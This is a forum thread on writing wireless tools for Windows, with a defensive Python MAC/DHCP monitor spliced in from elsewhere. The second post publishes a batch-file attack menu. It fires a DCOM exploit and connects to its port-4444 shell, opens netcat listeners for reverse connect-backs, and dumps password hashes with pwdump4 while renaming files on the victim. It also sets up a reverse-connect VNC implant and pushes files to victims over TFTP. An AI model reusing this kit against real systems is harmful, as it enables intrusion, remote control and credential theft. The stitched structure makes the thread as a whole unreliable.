Forums: Wireless Apps In Windows - Forums


Wireless Apps In Windows A quick guide to coding them...

#1 IDEspinner

  • Sergeant
  • Group: Specialist
  • Posts: 212
  • Joined: 16-October 04

Posted 21 October 2004 - 09:17 PM

Seeing the lack of posts in this forum makes me sad... so I will help fill it up.

Coding wireless applications in Windows.

Alright, when you are trying to code your very own netstumbler there are a few choices out there for you to use. Making a netstumbler clone is honestly pretty simple.

1.: Use WRAPI.

Quote

WRAPI is a software library that allows applications running in user space on mobile end stations to query information about the IEEE 802.11 network they are attached to. WRAPI 1.0 is implemented on the Windows XP operating system and is a hardware-independent tool that works with any IEEE 802.11b wireless network hardware vendor.
You can get WRAPI here:
hxxp://ramp.ucsd.edu/pawn/wrapi/

If you use WRAPI, you have the advantage that it is guaranteed to work regardless of the wireless card. The downside: you must use XP. WRAPI is a fairly straightforward library to use, with a nice set of functions. You can easily make a netstumbler clone with this in any language of your choice (after you compile WRAPI).

A major drawback to using WRAPI is that you must have the Windows DDK; not everybody has it, but it is free (minus shipping and handling?).
Get it here:
hxxp://www.microsoft.com/whdc/devtools/ddk/orderddkcd.mspx

2: Use WMI
When the Shmoo Group gave their presentation at ToorCon, I was definitely intrigued, because even though I knew all of it already, I never thought to use it. WMI has many functions that support a lot of wireless applications. Your netstumbler clone in VBScript couldn't be easier. To see a quick example of the functions that are provided you can just go to
start -> run -> "wbemtest" -> click connect -> under namespace put "root\wmi"
click "enum classes" -> click recursive -> click ok

Now here you see all the functions you are entitled to; specifically, scroll down to the
"MSNdis_80211_" fields and look at all those wireless functions... hmm, I wonder what we could do with those ;) Use your imagination.

If you want source, I found this example: "Wireless Signal Strength"
hxxp://www.samurize.com/modules/ipboard/index.php?showtopic=2505&st=0

3. Use WinPcap
Just because it's not specifically for wireless, and you can't grab management frames, doesn't make it useless.

Airsnare is a good example of this:
hxxp://home.comcast.net/~jay.deboer/airsnare/

Quote

AirSnare is another tool to add to your Wireless Intrusion Detection Toolbox.  AirSnare will alert you to unfriendly MAC addresses on your network and will also alert you to DHCP requests taking place.  If AirSnare detects an unfriendly MAC address you have the option of tracking the MAC address's access to IP addresses and ports or by launching Ethereal upon a detection.


Using WinPcap, found at
hxxp://winpcap.polito.it/
you can still code many useful utilities.

4. Driver/NDIS programming
Yep, last resort, but is it really that difficult?
Probably, but if you recall a recent post of mine regarding HostAP for Windows, you may recall a neat app called Prisma. If you happen to own a Prism 2 based card you can easily build off the source, since it's included. In fact, if you have anything to add, I'm sure they could use your help.

Quote

26/06/2004

Help needed for WEP cracking on windows !
I wrote a quick and dirty sample program to control Prism2 based cards using the Winpcap protocol driver and the PacketRequest API. WEP cracking requires the capture of 802.11 frames; this program shows how to set those cards into HostAP and monitor mode and contains functions to get/set parameters of  the Prism2 chipset. The FULL SOURCE CODE for Visual C++ is included, I hope that you can help me on some topics and problems I found. The code should compile without problems but to test the program you need a Prism2 based card and the Winpcap driver installed.
You can download Prisma here.


You can download Prisma here:
hxxp://www.oxid.it/downloads/Prisma_v1.0.zip


So wrapping it up, are you really limited on Windows?

Yes. :blink:

OK, but at least you have many options still available to you. Go out and code me a great app using a combination of all these methods; it's 100 percent possible!
0
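The AirSnare quote above describes two checks: alert on a MAC address that is not on the friendly list, and alert on DHCP requests seen on the wire. The following is an added example, not AirSnare's code and not code from this thread, showing those two checks in Python over raw Ethernet frames. The friendly-MAC list and the sample frames are constructed inline so it runs offline; on a real machine the frames would come from a WinPcap/libpcap capture loop rather than from the builder at the bottom.

```python
"""AirSnare-style monitor (added example): flag unknown source MACs and DHCP
client requests in raw Ethernet frames. Frames and the allowlist below are
constructed placeholders; a live version would read frames from a pcap loop."""
import struct
from dataclasses import dataclass
from typing import List, Optional, Set

# Constructed allowlist of "friendly" MAC addresses (placeholders, not real devices).
FRIENDLY_MACS: Set[str] = {"00:11:22:33:44:55", "66:77:88:99:aa:bb"}

ETHERTYPE_IPV4 = 0x0800
IPPROTO_UDP = 17
DHCP_CLIENT_PORT, DHCP_SERVER_PORT = 68, 67
DHCP_MAGIC = b"\x63\x82\x53\x63"
DHCP_MSG_TYPES = {1: "DISCOVER", 3: "REQUEST", 7: "RELEASE", 8: "INFORM"}


@dataclass
class Alert:
    kind: str      # "unknown_mac" or "dhcp"
    src_mac: str
    detail: str


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def dhcp_message_type(udp_payload: bytes) -> Optional[int]:
    """Return DHCP option 53 (message type), or None if not a well-formed DHCP message."""
    # BOOTP fixed header is 236 bytes, then the 4-byte magic cookie, then TLV options.
    if len(udp_payload) < 240 or udp_payload[236:240] != DHCP_MAGIC:
        return None
    i = 240
    while i < len(udp_payload):
        opt = udp_payload[i]
        if opt == 255:            # end option
            break
        if opt == 0:              # pad option has no length byte
            i += 1
            continue
        if i + 1 >= len(udp_payload):
            return None           # truncated option
        length = udp_payload[i + 1]
        if opt == 53 and length == 1:
            return udp_payload[i + 2]
        i += 2 + length
    return None


def inspect_frame(frame: bytes, friendly: Set[str] = FRIENDLY_MACS) -> List[Alert]:
    """Parse Ethernet -> IPv4 -> UDP -> DHCP only as far as the two alerts need."""
    alerts: List[Alert] = []
    if len(frame) < 14:
        return alerts
    src = mac_str(frame[6:12])
    ethertype = struct.unpack("!H", frame[12:14])[0]
    if src not in friendly:
        alerts.append(Alert("unknown_mac", src, "source MAC not in friendly list"))
    if ethertype != ETHERTYPE_IPV4 or len(frame) < 34:
        return alerts
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[0] >> 4 != 4 or ip[9] != IPPROTO_UDP or len(ip) < ihl + 8:
        return alerts
    sport, dport = struct.unpack("!HH", ip[ihl:ihl + 4])
    if sport == DHCP_CLIENT_PORT and dport == DHCP_SERVER_PORT:
        mtype = dhcp_message_type(ip[ihl + 8:])
        if mtype is not None:
            name = DHCP_MSG_TYPES.get(mtype, f"type {mtype}")
            alerts.append(Alert("dhcp", src, f"DHCP {name} from client"))
    return alerts


def scan(frames: List[bytes]) -> List[Alert]:
    return [a for f in frames for a in inspect_frame(f)]


def build_dhcp_frame(src_mac: bytes, msg_type: int) -> bytes:
    """Construct a broadcast DHCP client frame (Ethernet/IPv4/UDP/BOOTP) as sample input."""
    bootp = struct.pack("!BBBBIHH4s4s4s4s16s64s128s", 1, 1, 6, 0, 0x3903F326, 0, 0x8000,
                        b"\0" * 4, b"\0" * 4, b"\0" * 4, b"\0" * 4,
                        src_mac + b"\0" * 10, b"\0" * 64, b"\0" * 128)
    payload = bootp + DHCP_MAGIC + bytes([53, 1, msg_type, 255])
    udp = struct.pack("!HHHH", DHCP_CLIENT_PORT, DHCP_SERVER_PORT, 8 + len(payload), 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0, 0, 64, IPPROTO_UDP, 0,
                     b"\0" * 4, b"\xff" * 4) + udp     # checksum left 0; the monitor ignores it
    return b"\xff" * 6 + src_mac + struct.pack("!H", ETHERTYPE_IPV4) + ip


# Constructed sample traffic: a friendly host asking for a lease, an unknown host
# asking for one, and an ARP frame from a friendly host that should raise nothing.
SAMPLE_FRAMES = [
    build_dhcp_frame(bytes.fromhex("001122334455"), 1),
    build_dhcp_frame(bytes.fromhex("deadbeef0001"), 3),
    b"\xff" * 6 + bytes.fromhex("66778899aabb") + b"\x08\x06" + b"\0" * 28,
]

if __name__ == "__main__":
    for a in scan(SAMPLE_FRAMES):
        print(f"[{a.kind}] {a.src_mac}: {a.detail}")
```

Run as-is it prints one DHCP alert for the friendly host and two alerts (unknown MAC, then DHCP REQUEST) for the unknown one; the ARP frame stays silent. The parser deliberately stops at the fields it needs and returns early on anything malformed, which is the habit you want in code that reads attacker-controlled bytes off a shared medium.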

#2 midnightsavage

  • Private
  • Group: Members
  • Posts: 9
  • Joined: 05-February 04

Posted 23 November 2004 - 09:59 PM

Well, this is my first post, so I hope someone gets something out of it. I don't know a lot about hacking and only basic programming, so no flames please. You have to configure your program locations in the other batch files, and you have to configure your wireless network name for the change IP part. I wrote these bat files to give me a central interface when I was wardriving. Comments or improvements are appreciated.

In order to use this you must have these programs.

aircrack.exe
airodump.exe
cain.exe
netstumbler.exe
nmap.exe
pwdump4.exe google
tftpd32.exe google
kaht2.exe google
nc.exe google
winfo.exe google
DcomExploit.exe google
installer.exe and client.exe from institution 2004 vnc package VNC



All the batch files must be named the same unless you want to change the code.


This is wireless.bat
color 0a
rem I hardly consider myself a hacker of any sort. I put this together because I wanted
rem a central interface when I was wardriving. Windows batch programming is hardly
rem programming and I wish I could have written this in REAL code. I would advise
rem against trying to break into a company of any size. They have the technology to
rem catch you. HAVE FUN!

:start
title Welcome to the MATRIx:
@echo off
echo
echo
cls
echo                  +----------------------------------------------------+
echo                  =           WIRLE$$ TE$T KIT                         =
echo                  =        STRESSFRACTURE                              =  
echo                  =           stress_fracture@excite.com               =
echo                  +----------------------------------------------------+                                 

                   
echo /) Local IP Configuration                ') Dcom Exploit Connect
echo.                                                                           
echo .) Net View                             ;) VNC Server Edit                                                 

                              
echo ,) NMAP Scan                             L) Start TFTP Server
echo.                                             
echo M) Trace Route                           K) VNC Client
echo.   
echo N) Netcat Listener                       J) Air Dump
echo.   
echo B) Hack Server                           H) Air Crack
echo.   
echo V) ARP cache                             G) Cain
echo.   
echo C) KAHT2                                 F) IP Renew
echo.  
echo X) Dcom Exploit                          D) Command Prompt
echo.   
echo.Q) Open Directory                        S) PWDUMP4
echo. 
echo.A) Netstumbler                           \) Winfo
echo.
echo.]) Change IP                             Z) Exit
echo.   


:choice
set /p c=                                $: 
if "%C%"=="/" goto localip
if "%C%"=="." goto shares 
if "%C%"=="," goto nmap
if "%C%"=="m" goto traceroute
if "%C%"=="n" goto netcat
if "%C%"=="b" goto server
if "%C%"=="v" goto arp
if "%C%"=="c" goto kaht2
if "%C%"=="x" goto dcomexploit
if "%C%"=="'" goto dcomconnect
if "%C%"==";" goto vncedit
if "%C%"=="l" goto tftp
if "%C%"=="k" goto vncclient
if "%C%"=="j" goto airdump
if "%C%"=="h" goto aircrack
if "%C%"=="g" goto cain
if "%C%"=="f" goto iprenew
if "%C%"=="q" goto opendir
if "%C%"=="d" goto command
if "%C%"=="s" goto pwdump
if "%C%"=="a" goto netstumbler
if "%C%"=="\" goto winfo
if "%C%"=="]" goto ipchange
if "%C%"=="z" goto :eof

if "%C%"=="/" goto localip
if "%C%"=="." goto shares 
if "%C%"=="," goto nmap
if "%C%"=="M" goto traceroute
if "%C%"=="N" goto netcat
if "%C%"=="B" goto server
if "%C%"=="V" goto arp
if "%C%"=="C" goto kaht2
if "%C%"=="X" goto dcomexploit
if "%C%"=="'" goto dcomconnect
if "%C%"==";" goto vncedit
if "%C%"=="L" goto tftp
if "%C%"=="K" goto vncclient
if "%C%"=="J" goto airdump
if "%C%"=="H" goto aircrack
if "%C%"=="G" goto cain
if "%C%"=="F" goto iprenew
if "%C%"=="D" goto command
if "%C%"=="Q" goto opendir
if "%C%"=="S" goto pwdump
if "%C%"=="A" goto netstumbler
if "%C%"=="|" goto winfo
if "%C%"=="}" goto ipchange
if "%C%"=="Z" goto :eof


:localip
cls
@echo off
ipconfig 
pause
goto :start
:shares
cls

@echo off
rem this doesn't usually work
net view 
echo Enter Target:
set /p netviewtarget=
net view  %netviewtarget%
pause
goto :start
:nmap
rem nmap has to be in the same directory as wireless.bat or you can change directory with cd
cls
rem nmap settings can be changed, these are just what I like to use.
@echo off
set /p scantarget=Enter Target:
@echo Enter Scan Type:
@echo S -sS
@echo T -sT
@echo V -sV
@echo Must be capital
set /p scantype=

nmap -s%scantype% -P0 -T Insane -vv  %scantarget%
pause

goto :start

:traceroute

@echo off
set /p tracetarget=Enter Target:
tracert %tracetarget%
pause
goto :start

:netcat
rem netcat must be in the same directory
@echo Enter port:
set /p port=
start "Netcat listening on port %port%" /MIN nc -v -t -l -p %port% -L
echo Netcat server started on port %port%
pause
goto :start

:server
rem ports  used for reverse connect backs. Put whatever you want here.
start /MIN nc -t -v -l -p  80 -L
start /MIN nc -t -v -l -p  666 -L
start /MIN nc -t -v -l -p  8080 -L
start /MIN nc -t -v -l -p  9999 -L
start /MIN nc -t -v -l -p 22178 -L
start /MIN nc -t -v -l -p 31337 -L
echo Netcat listening on ports 80, 666, 8080, 9999, 22178, 31337...
pause
goto :start
:arp
arp -a
pause 
goto :start

:kaht2
set /p  ip1=First IP Address:
set /p ip2=Second IP Address:
start kaht2 %ip1% %ip2%
goto :start

:dcomexploit
echo 0 win32 2000 SP0
echo 1 win32 2000 SP1
echo 2 win32 2000 SP2
echo 3 win32 2000 SP3
echo 4 win32 2000 SP4
echo 5 win32 XP SP0
echo 6 win32 XP SP1
echo Shell on port 4444 if exploit successful
set /p  targetid=Enter Version:
set /p  address=Enter IP:
echo Shell on port 4444 if exploit successful
start dcomexploit %targetid% %address%

goto :start 

:dcomconnect
rem this is for a computer exploited with dcomexploit above.
set /p target=Enter Target:
start  nc %target% 4444
goto :start

 :vncedit
start vncedit.bat
goto :start

:tftp
rem I always keep tftpd32 in my program directory but you can change it to wherever it's at
rem in case you're wondering, tftp is for transferring files, ex "tftp -i server get filename" or "tftp -i server put filename"; usually takes a couple of tries on the victim if you get unexpected block errors

start /min tftpd32.exe
goto  :start

:vncclient
start /min client.exe
goto :start

:airdump
start airodump.bat
goto :start

:aircrack
rem edit aircrack location in aircrack.bat
start aircrack.bat
goto :start
 
:cain
rem Cain can be found at  http:\\www.oxid.it
rem Edit the location where cain is located in cain.bat
start cain.bat
goto :start

:iprenew
rem this renews your IP address on a DHCP enabled AP
start /min ipconfig /renew
goto :start

:opendir
start opendir.bat
goto :start
 
:command
start 
goto :start

:pwdump
cls
echo off
set   target=0
set   share=0
set   output=0
set   username=0
set   rename=0
set /p  target=Enter Target IP:
set /p  share=Enter Share:
set /p output=Enter Output File Name:
set /p username=Enter Username:
set /p rename=Rename Files on Victim to:
pwdump4 %target% /s:%share% /o:%output% /u:%username% /r:%newname%
pause
goto :start

:netstumbler
start netstumbler.bat
goto :start

:winfo
cls
set /p target=Enter Target:
set /p textfile=Enter text file Prefix:
set /p var=Use Null Session(y/n)
if "%var%"=="y"  winfo %target% -n -v >> %textfile%.txt 
if "%var%"=="n"  winfo %target%  -v  >> %textfile%.txt
start  %textfile%.txt
goto :start

:ipchange 
start ipchange.bat
goto :start



This is airodump.bat
echo  off
echo                  +----------------------------------------------------+
echo                  =           WIRLESS TE$T KIT                         =
echo                  =       Coded by STRESSFRACTURE                      =  
echo                  =         stress_fracture@excite.com                 =
echo                  +----------------------------------------------------+            

cd\
cd documents and settings\travis\desktop\hacktools\hacktoolsx\cap
start  airodump 
exit

This is cain.bat
echo off
echo                  +----------------------------------------------------+
echo                  =           WIRLESS TE$T KIT                         =
echo                  =       Coded by STRESSFRACTURE                      =  
echo                  =         stress_fracture@excite.com                 =
echo                  +----------------------------------------------------+            

cd\
cd program files\y.bin\cain
start  cain.exe
exit





This is ipchange.bat
echo off
echo                  +----------------------------------------------------+
echo                  =           WIRLESS TE$T KIT                         =
echo                  =       Coded by STRESSFRACTURE                      =  
echo                  =         stress_fracture@excite.com                 =
echo                  +----------------------------------------------------+            

echo off
rem You have to edit Orinoco for the name of your connection

set /p x=DHCP 1     STATIC 2      :
if "%x%"=="1" goto dhcp
if "%x%"=="2" goto static



:static
echo off
set /p ip=Enter new IP:
echo.
set /p sm=Enter Subnet Mask:
echo.
set /p gw=Enter Default Gateway:
netsh interface ip set dns "Orinoco" static %gw%
netsh interface ip set address "Orinoco" static %ip% %sm% %gw% 1
rem skip the DHCP section below, otherwise the static settings just applied are undone
goto done

:dhcp
netsh interface ip set dns name="Orinoco" source=dhcp
netsh interface ip set address name="Orinoco" source=dhcp

:done
pause


exit






This is netstumbler.bat
echo off
echo                  +----------------------------------------------------+
echo                  =           WIRLESS TE$T KIT                         =
echo                  =       Coded by STRESSFRACTURE                      =  
echo                  =         stress_fracture@excite.com                 =
echo                  +----------------------------------------------------+            
cd\
cd program files\network stumbler
start  netstumbler.exe
exit

This is explorer.bat
echo off
echo                  +----------------------------------------------------+
echo                  =           WIRLESS TE$T KIT                         =
echo                  =       Coded by STRESSFRACTURE                      =  
echo                  =         stress_fracture@excite.com                 =
echo                  +----------------------------------------------------+            
start explorer c:\documents and settings\travis\desktop\hacktools\hacktoolsx
exit





This is installer.bat
echo off
echo                  +----------------------------------------------------+
echo                  =           WIRLESS TE$T KIT                         =
echo                  =       Coded by STRESSFRACTURE                      =  
echo                  =         stress_fracture@excite.com                 =
echo                  +----------------------------------------------------+            

echo off
cd\
cd documents and settings\travis\desktop\hacktools\hacktoolsx\tftp
rem This edits the Institution VNC reverse connect back vnc server
echo.
echo.
@echo Reverse VNC connect Listener Editor
echo.
echo.
set /p ip=Enter your IP:
set /p port=Enter Port Client Listening on:
installer.exe -e "dll32"  %ip% %port%
exit




This is aircrack.bat
echo off
echo                  +----------------------------------------------------+
echo                  =           WIRLESS TE$T KIT                         =
echo                  =       Coded by STRESSFRACTURE                      =  
echo                  =         stress_fracture@excite.com                 =
echo                  +----------------------------------------------------+            
cd\
cd documents and settings\travis\desktop\hacktools\hacktoolsx\cap
start aircrack
exit


I would post everything you need here, but alas, I am limited by the restrictions on this forum :rolleyes:
0

#3 320X

  • Master Sergeant
  • Group: Members
  • Posts: 473
  • Joined: 13-December 03

Posted 07 November 2005 - 06:42 PM

midnightsavage, the bad thing about airodump is it doesn't work with Prism chipsets in Windows. Only to say there is a Windows program to add to this collection named aire; I will add it later with the name aire.rar in the download section.
0

#4 wootski

  • Private
  • Group: Members
  • Posts: 2
  • Joined: 14-May 07

Posted 11 June 2007 - 07:00 PM

Meh, you can now inject on Windows as it was ported to Cygwin (although it does crash easily). Should make a video of your scripts in use :)

P.S. What's the difference between the normal dcomexploit.exe and kaht2.exe?
0

#5 hugopnr

  • Private First Class
  • Group: Members
  • Posts: 112
  • Joined: 11-July 07

Posted 13 July 2007 - 06:17 AM

One thing I wanted to add:
If you just want to develop a program which does some generic network operation over a wireless network (like sending and receiving data), there wouldn't be ANY difference between your ordinary net code and wireless code. But if you want to do some specific 802.11 operation, you should consider doing what the post said...
"Power tends to corrupt, and absolute power corrupts absolutely. Great men are almost always bad men." -LORD ACTON
hugo.pnr~
0
